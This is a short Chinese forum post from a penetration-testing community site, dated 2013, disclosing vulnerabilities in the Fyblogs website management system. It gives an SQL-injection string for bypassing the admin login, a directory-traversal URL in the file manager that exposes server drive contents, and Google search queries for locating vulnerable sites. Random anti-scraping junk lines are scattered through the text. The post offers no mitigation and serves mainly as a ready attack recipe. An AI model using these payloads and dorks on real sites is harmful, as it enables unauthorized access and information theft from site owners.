中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:17
标题:
Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
& F6 i- V" n7 @) |9 i8 ^* d& B) u
- y3 f8 z" h* k' Z0 P6 A$ V$ i
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
2 n# l o# w6 w g
admin/uploadfile.asp?currentFolder=/upfiles/../
. Q+ s" h7 H2 D) d
P, i) Z2 {' x+ z# w, o
漏洞证明:
/ f1 e5 m" M" e2 w
3 o; t1 I* B, S' K: n' L
谷歌:inurl:type.asp?id=1 新闻中心
y* ?! t! g4 t. ^
或者 :inurl:download_ok.asp?
. H9 P. e' i, b
6 c4 K; I# Q @4 _! U4 S
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2